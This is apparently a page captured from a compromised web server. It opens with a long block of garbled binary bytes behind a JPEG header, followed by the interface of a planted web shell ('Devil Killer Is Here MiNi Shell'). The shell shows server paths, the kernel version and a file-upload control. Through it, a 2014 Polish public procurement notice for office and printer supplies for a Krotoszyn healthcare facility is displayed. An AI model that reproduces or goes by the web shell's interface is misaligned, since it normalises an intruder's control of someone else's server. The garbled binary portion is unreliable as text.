JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140404/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140404/114952-N-2014.html

<p class="kh_header"><b>Krotoszyn: DOSTAWA MATERIAŁÓW PAPIERNICZYCH I BIUROWYCH, MATERIAŁÓW EKSPLOATACYJNYCH DO DRUKAREK I FAKSÓW ORAZ DOSTAWA PŁYT CD I DVD, OPASEK IDENTYFIKACYJNYCH DLA SPZOZ KROTOSZYN.</b><br>
<b>Numer ogłoszenia: 114952 - 2014; data zamieszczenia: 04.04.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej , ul. Młyńska 2, 63-700 Krotoszyn, woj. wielkopolskie, tel. 062 5880390 w. 253, faks 062 5880402.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.spzoz.krotoszyn.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWA MATERIAŁÓW PAPIERNICZYCH I BIUROWYCH, MATERIAŁÓW EKSPLOATACYJNYCH DO DRUKAREK I FAKSÓW ORAZ DOSTAWA PŁYT CD I DVD, OPASEK IDENTYFIKACYJNYCH DLA SPZOZ KROTOSZYN..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> DOSTAWA MATERIAŁÓW PAPIERNICZYCH I BIUROWYCH, MATERIAŁÓW EKSPLOATACYJNYCH DO DRUKAREK I FAKSÓW ORAZ DOSTAWA PŁYT CD I DVD, OPASEK IDENTYFIKACYJNYCH - PAKIET 1-7..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>DOSTAWA MATERIAŁÓW PAPIERNICZYCH I BIUROWYCH, MATERIAŁÓW EKSPLOATACYJNYCH DO DRUKAREK I FAKSÓW ORAZ DOSTAWA PŁYT CD I DVD, OPASEK IDENTYFIKACYJNYCH, MAKSYMALNIE 20% ZAMÓWIENIA PODSTAWOWEGO.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7, 22.99.30.00-7, 30.19.76.30-1, 30.19.76.44-2, 30.19.93.30-2, 30.19.97.13-1, 30.12.51.10-5, 30.19.23.20-0, 30.19.23.40-6, 32.58.20.00-6, 22.45.51.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oferta winna zawierać wszystkie dokumenty i oświadczenia wymienione w rozdziale VI niniejszej SIWZ oraz : 
a.	Formularz ofertowy podpisany przez osobę upoważnioną do składania oświadczenia woli w imieniu wykonawcy z wykorzystaniem wzoru - załącznik nr 1.
b.	Formularz cenowy podpisany przez osobę upoważnioną do składania oświadczenia woli w imieniu wykonawcy z wykorzystaniem wzoru - załącznik nr 2. Do oferty należy dołączyć wypełnione Formularze cenowe również w formie elektronicznej (plik.xls) z niezablokowanymi formułami. Formularze cenowe w formie pliku.xls umieszczone są i dostępne do ściągnięcia na stronie internetowej Zamawiającego www.bip.spzoz.krotoszyn.pl .

3.	W przypadku podpisania oferty oraz poświadczenia za zgodność z oryginałem kopii dokumentów przez osobę niewymienioną w dokumencie rejestracyjnym (ewidencyjnym) Wykonawcy, należy do oferty dołączyć stosowne pełnomocnictwo (oryginał lub kopia poświadczona za zgodność z oryginałem przez notariusza).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>§ 6 Projektu umowy: 2. Strony ustalają możliwość zmiany cen wynikających z okoliczności, których nie można było przewidzieć w chwili zawarcia niniejszej umowy. Za okoliczność taką uważa się : - ustawową zmianę stawek podatku VAT. 3. W przypadku ustawowej zmiany stawki podatku VAT na przedmiot niniejszego zamówienia, jej zmiana następuje z mocy prawa. §14 Projektu umowy:2.Strony dopuszczają zmiany umowy w zakresie:-nazwy produktu przy zachowaniu jego parametrów,-przedmiotowym/produkt zamienny,-sposobu konfekcjonowania,-liczby opakowań,-wprowadzenie do sprzedaży przez wykonawcę produktu zmodyfikowanego/udoskonalonego, -przedłużenia terminu realizacji umowy do czasu wykorzystania przedmiotu umowy, do wartości nie większej niż całkowita wartość umowy, maksymalnie 12 miesięcy. Powyższe zmiany nie mogą skutkować zmianą ceny jednostkowej i nie mogą być niekorzystne dla Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.spzoz.krotoszyn.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej ul. Młyńska 2 63-700 Krotoszyn Pokój nr 20..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.04.2014 godzina 09:00, miejsce: Samodzielny Publiczny Zakład Opieki Zdrowotnej ul. Młyńska 2 63-700 Krotoszyn Sekretariat..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet 1 - Artykuły biurowo-papiernicze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Blok makul.not. A-4 w kratke 100 k. bez perforacji  szt. 100
2. Blok makul.not. A-5 w kratke 100 k. bez perforacji szt. 150
3. Blok makul.not. A-6 w kratke 100 k. szt. 100
4. Blok rysunkowy A-4 szt. 5
5. Blok techniczny A-4 szt. 70
6. Cienkopis kolorowy klasy /Pelikan, Stabilo/ w kolorze czarnym, niebieskim, czerwonym, ziolonym (kolory wg. wyboru zamawiającego) szt. 1100
7. Deska A-4 z klipem nie zamykana (kolory wg.wyboru zamawiającego) szt. 20
8. Deska A-4 z klipem zamykana  (kolory wg.wyboru zamawiającego) szt. 270
9. Długopis automatyczny klasy Zenith z wkładem w kolorze czarnym, niebieskim (kolory wkładu wg wyboru Zamawiającego) szt. 30
10. Długopis automatyczny średniej klasy z wkładem w kolorze czarnym, niebieskim, czerwonym, ziolonym (kolory wkładu wg wyboru Zamawiającego) szt. 1400
11. Długopis na przylepiec   szt. 5
12. Długopis żelowy klasy  Uni - ball signo automatyczny z wkładem w kolorze czarnym, niebieskim (kolory wkładu wg wyboru Zamawiającego) szt. 20
13. Długopis żelowy z zatyczką klasy TOP z wkładem w kolorze czarnym, niebieskim (kolory wkładu wg wyboru Zamawiającego) szt. 50
14. Dziurkacz metalowy 2 otwory, na co najmniej 30 kartek z ogranicznikiem szt. 10
15. Dziurkacz metalowy 2 otwory,. duży z ogranicznikiem, na co najmniej 15 kartek szt. 10
16. Etykieta samoprzylepna 210mm * 297 mm, A4, z nacięciem z tyłu op. 100szt op. 2
17. Etykieta samoprzylepna 52,5mm * 29,7mm, A4, op 100szt.typu Multi3 lub Sinel op. 200
18. Folia do laminowania A-3  op. 100 szt. gramatura 60mic op. 3
19. Folia do laminowania A-4  op. 100 szt. gramatura 60mic op. 10
20. Folia do laminowania formatu 60*95 mm op.100szt. /100 mikronów/ op. 10
21. Folia do laminowania formatu 65*95 mm op.100szt./80mikronów/ op. 10
22. Folia do laminowania samoprzylepna A4 100 szt op. 5
23. Grafity gr.0,5mm a 10szt op. 10
24. Grzbiet do bindownicy szer. 10 mm  op. 100 szt. op. 1
25. Grzbiet do bindownicy szer. 12 mm  op. 100 szt. op. 1
26. Grzbiet do bindownicy szer. 14 mm  op. 100 szt. op. 2
27. Grzbiet do bindownicy szer. 16 mm  op. 100 szt. op. 1
28. Grzbiet do bindownicy szer. 18 mm  op. 100 szt. op. 1
29. Grzbiet do bindownicy szer. 20 mm  op. 100 szt. op. 1
30. Grzbiet do bindownicy szer. 22 mm  op. 100 szt. op. 1
31. Grzbiet do bindownicy szer. 25 mm  op. 100 szt. op. 1
32. Grzbiet do bindownicy szer. 6 mm  op. 100 szt. op. 1
33. Grzbiet do bindownicy szer. 8 mm  op. 100 szt. op. 1
34. Gumka do mazania-klasy /Pelikan/ szt. 50
35. Gumki recepturki kg 4
36. Identyfikator, kieszonka z elastycznej folii otwarta od góry z wycięciem do założenia paska z klipsem format 78*110 mm szt. 300
37. Kalka maszynowa A - 3  25szt pacz. 1
38. Kalka maszynowa A - 4  25 szt.  pacz. 1
39. Kalka ołówkowa A - 3 25 szt. pacz. 1
40. Kalka ołówkowa A - 4 25 szt. pacz. 1
41. Kartki do not. samoprzylepne 40x50 mm op. 250
42. Kartki do not. samoprzylepne 75x100mm op. 50
43. Kartki do not. samoprzylepne 75x75 mm op. 200
44. Klej biurowy w sztyfcie wkręcany 9 gr. szt. 50
45. Klej biurowy w tubce 50 ml szt. 100
46. Klips metalowy do identyfikatora z paskiem z mocnego przezroczystego tworzywa i metalowym zatrzaskiem szt. 200
47. Koperta B-4  op. 100 szt., szara, HK z paskiem op. 50
48. Koperta B-5   op. 100 szt. szara,  HK z paskiem op. 150
49. Koperta C-5  op. 100 szt.  Biała, HK z paskiem op. 80
50. Koperta do płyt CD, op. 10 szt., z okienkiem op. 1650
51. Koperta samoprzlepna C-6  op. 100 szt.  biała op. 220
52. Koperta samoprzylepna B-4  składana szara, op. 100 szt. op. 10
53. Koperta z zabezpieczeniem powietrznym w formie folii bąbelkowej do płyt CD biała , samoklejąca z paskiem szt. 30
54. Koperta z zabezpieczeniem powietrznym w formie folii bąbelkowej, D14 biała , samoklejąca z paskiem szt. 20
55. Koperta z zabezpieczeniem powietrznym w formie folii bąbelkowej, H18 biała , samoklejąca z paskiem szt. 20
56. Koperta z zabezpieczeniem powietrznym w formie folii bąbelkowej, I19 biała , samoklejąca z paskiem szt. 20
57. Kuwety na dokumenty szt. 20
58. Linijka przezroczysta  20 cm szt. 15
59. Linijka przezroczysta  30 cm szt. 20
60. Linijka przezroczysta  50 cm szt. 1
61. Linijka przezroczysta 15 cm szt. 5
62. Listwa   na  A4 wsuwana  szerokośc 15 mm  szt. 50
63. Marker do płyt CD dwustronny, jedna końcówka do 0.5mm a druga od 0.6 do 0.8mm, wodoodporny szt. 120
64. Marker gruby 1-4mm, ścięta końcówka wodoodporny klasy BIC lub Reynolds, czarny szt. 1300
65. Marker gruby 1-4mm, ścięta końcówka wodoodporny klasy Reynolds w kolorach: brąz, fiolet, pomarańcz, czarny (kolory wg wyboru Zamawiającego) szt. 60
66. Nożyczki do papieru duże metalowe   typ Patio lub Scotch szt. 30
67. Nożyczki do papieru małe metalowe    typ Patio lub Scotch szt. 20
68. Obwoluta A-4 do segr. miękka  op. 100 szt., groszkowa op. 380
69. Obwoluta A-4 do segr. z zamknięciem op. 25 szt. op. 30
70. Obwoluta A-4 przezroczysta twarda, zgrzew w kształcie litery L. szt. 180
71. Obwoluta A-4 przezroczysta twarda, zgrzew w kształcie litery U szt. 50
72. Obwoluta A-5 przezroczysta miękka  op. 100 szt. op. 10
73. Okładka A4 na zeszyt szt. 10
74. Okładka A5 na zeszyt szt. 10
75. Okładka do bindownicy karton  op. 100 szt., A-4, kolor biały op. 4
76. Okładka do bindownicy przezroczysta op. 100 szt., A-4, gr. 150mic op. 4
77. Ołówek automat z grafitem 0,5 mm szt. 20
78. Ołówki  /HB/  z gumką szt. 100
79. Pinezki kolorowe tablicowe beczułki 100 szt. op. 25
80. Pinezki opakowanie 50 szt. op. 10
81. Pisak klasa Point Marker biały olejowy grubość końcówki od 0.5 do 1.2mm szt. 5
82. Poduszka do pieczątek 11,5x7cm nasączona klasy np. Trodat szt. 5
83. Pojemnik na dokumenty  plastikowy stojący do czasopism szt. 10
84. Rozszywacz do zszywek szt. 10
85. Segregator A-3 na 4 otwory w pionie szt. 2
86. Segregator kolorowy A-4 / 3 twardy        szt. 40
87. Segregator kolorowy A-4 / 5  ze wzm. dołem, twardy szt. 100
88. Segregator kolorowy A-4 / 7  ze wzm. dołem, twardy szt. 400
89. Segregator kolorowy A5 / 7 wzmacniany dołem szt. 40
90. Segregator tekturowy A-4 / 5  szt. 10
91. Segregator tekturowy A-4 / 7 szt. 20
92. Skoroszyt plastikowy A 4 z otworami do wpinania w segregator szt. 1300
93. Skoroszyt plastikowy A-4 szt. 30
94. Skoroszyt tekturowy A - 4 z otworami do wpinania w segregator, gramatura 300 g/m2,  biały szt. 50
95. Skoroszyt tekturowy A -4, gramatura 300 g/m2, biały szt. 50
96. Skorowidz w kratke A-4 szt 5
97. Spinacze biurowe 33 mm op. 230
98. Spinacze biurowe 50 mm op. 10
99. Szpagat jutowy gruby pakowy 500 gr. motek 3
100. Taśma klejąca dwustronna 5 cm / 5 m szt. 60
101. Taśma klejąca pakowa -szara 5 cm. / 60 m. szt. 100
102. Taśma przezroczysta klejąca szer. 25mm dł. 30 jardów szt. 200
103. Teczka papierowa wiązana biała, A 4, gramatura 300 g/m2,   szt. 20
104. Teczka papierowa.na gumkę kolorowa, A 4 szt. 1200
105. Teczka plastikowa wiązana, A 4 szt. 20
106. Teczka zawieszkowa A4 szt 75
107. Temperówka do ołowków z pojemnikiem szt. 30
108. Tusz do pieczątek klasy Trodat lub Pelikan, kolor czerwony, niebieski, czarny (kolor wg wyboru Zamawiającego), szt. 100
109. Wkłady do długopisu  zaoferowanego w pozycji 10  w kolorze czarnym, niebieskim, czerwonym, ziolonym (kolory wkładu wg wyboru Zamawiającego) szt. 500
110. Wkłady do długopisu zaoferowanego w pozycji 9  w kolorze czarnym, niebieskim (kolory wkładu wg wyboru Zamawiającego) szt. 30
111. Wkłady do długopisu zaoferowanego w pozycji 12  w kolorze czarnym, niebieskim (kolory wkładu wg wyboru Zamawiającego) szt. 20
112. Wkłady do długopisu zaoferowanego w pozycji 13 w kolorze czarnym, niebieskim (kolory wkładu wg wyboru Zamawiającego) szt. 50
113. Zakreślacz-flamaster różne kolory  wg wyboru Zamawiającego szt. 150
114. Zeszyt 200 kartek twarda oprawa. A-4 zszyw. szt. 2
115. Zeszyt w krat 32 k. miękka oprawa  A 5 szt. 80
116. Zeszyt w krat 60 k. miekka oprawa, A 5 szt. 130
117. Zeszyt w krat 80 k. miękka oprawa , A 5 szt. 30
118. Zeszyt w krat 96 k. miękka opr. A-4 zszyw. szt. 30
119. Zeszyt w krat 96 k. twarda opr.A-4 zszyw. szt. 100
120. Zeszyt w krat 96 k. twarda oprawa A-5 szt. 100
121. Zszywacz biurowy na 25 kartek szt. 10
122. Zszywacz biurowy obrotowy szt. 20
123. Zszywki 24/6 , 1000 szt. op. 600

Brak wypełnienia kolumny -Nazwa handlowa i producent - wymaganymi informacjami spowoduje odrzucenie oferty na podstawie art. 89 ust. 1 pkt 2 Pzp..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet 2 - Artykuły papiernicze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Papier uniwersalny biały  80 gr / m2  A-4 klasa nie niższa niż np. -Poljet-	ryza 500szt.	20
2.	Papier uniwersalny biały  80 gr / m2  A-4 klasa nie niższa niż np. -Pollux-	ryza 500szt.	20
3.	Papier uniwersalny biały  80 gr / m2  A-3 klasa nie niższa niż np. -Pollux-	ryza 500szt.	10
4.	Papier uniwersalny biały  80 gr/ m2  A-4 klasa nie niższa niż np. -Polspeed-	ryza 500szt.	1450
5.	Papier uniwersalny biały 80 gr/ m2  A-3 klasa nie niższa niż np. -Polspeed-	ryza 500szt.	20
6.	Papier uniwersalny biały  80 gr/ m2  A-5 klasa nie niższa niż np. -Polspeed-	ryza 500szt.	60
7.	Papier komputerowy 240 x 6 1+0, 4000 składek/karton	karton	2
8.	Papier komputerowy  210 1+0, 2000 składek/karton	karton	2
9.	Papier kolorowy A-4 do ksera jeden kolor, 100 kartek	ryza	10
10.	Papier kolorowy A-3 do ksera jeden kolor, 100 kartek	ryza	1
11.	Papier kancelaryjny w kratkę A-3 op. 500 szt.	ryza	2
12.	Papier wizytówkowy A-4,  op. 20 szt.	op.	50
13.	Papier fotograficzny do drukarek A4 50 szt., gramat. 200	op.	2
14.	Papier biały satynowany A4, gramatura 250g/m2, paczka 250szt.	ryza	2
15.	Taśma papierowa biała do maszyn liczących 57 mm (25m)	szt.	10
16.	Taśma papierowa biała termoczuła 110 mm (20m)	szt.	40
17.	Taśma papierowa biała termoczuła 57 mm (25m)	szt.	160
18.	Taśma papierowa termoczuła 79mm 25 m	szt.	20
19.	Taśma papierowa termoczuła biała 57 mm 14 m	szt.	180

Uwaga! 
- poz. 1 - 6 - zaoferowany papier powinien być zgodny z normą PN-ISO 9706:2001 lub równoważną
Brak wypełnienia kolumny -Nazwa handlowa i producent - wymaganymi informacjami spowoduje odrzucenie oferty na podstawie art. 89 ust. 1 pkt 2 Pzp..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 22.99.30.00-7, 30.19.76.30-1, 30.19.76.44-2, 30.19.93.30-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pakiet 3 - Koperty do błon rentgenowskich.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Koperta RTG 6 x 5 biała	szt.	1 200
2.	Koperta RTG 20 x 26  biała	szt.	4 000
3.	Koperta RTG 26 x 32 biała	szt.	5 000
4.	Koperta RTG 37 x 37 biała	szt.	3 000
5.	Koperta RTG 42 x 32 biała	szt.	1 200
6.	Koperta RTG 45 x 37 biała	szt.	2 000
7.	Koperta RTG 50 x 42 biała	szt.	500
8.	Koperta RTG 16 x 23 biała	szt.	3 000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.97.13-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pakiet 4 - Materiały eksploatacyjne do drukarek komputerowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Taśma do drukarki igłowej Lexmark 2381 plus / 2390 Plus	0011A3540 	szt.	5
2.	Taśma do drukarki igłowej OKI Microline 3320	9002303	szt.	5
3.	Toner do drukarki laserowej HP 1005 	C7115A 	szt.	5
4.	Toner do drukarki laserowej HP 1020	Q2612A 	szt.	95
5.	Toner do drukarki laserowej HP 1100	C4092A 	szt.	5
6.	Toner do drukarki laserowej HP 1200	C7115X 	szt.	15
7.	Toner do drukarki laserowej HP 1320	Q5949X 	szt.	10
8.	Toner do drukarki laserowej HP P2015	Q7553X 	szt.	10
9.	Toner do drukarki laserowej HP P1006	CB435A 	szt.	20
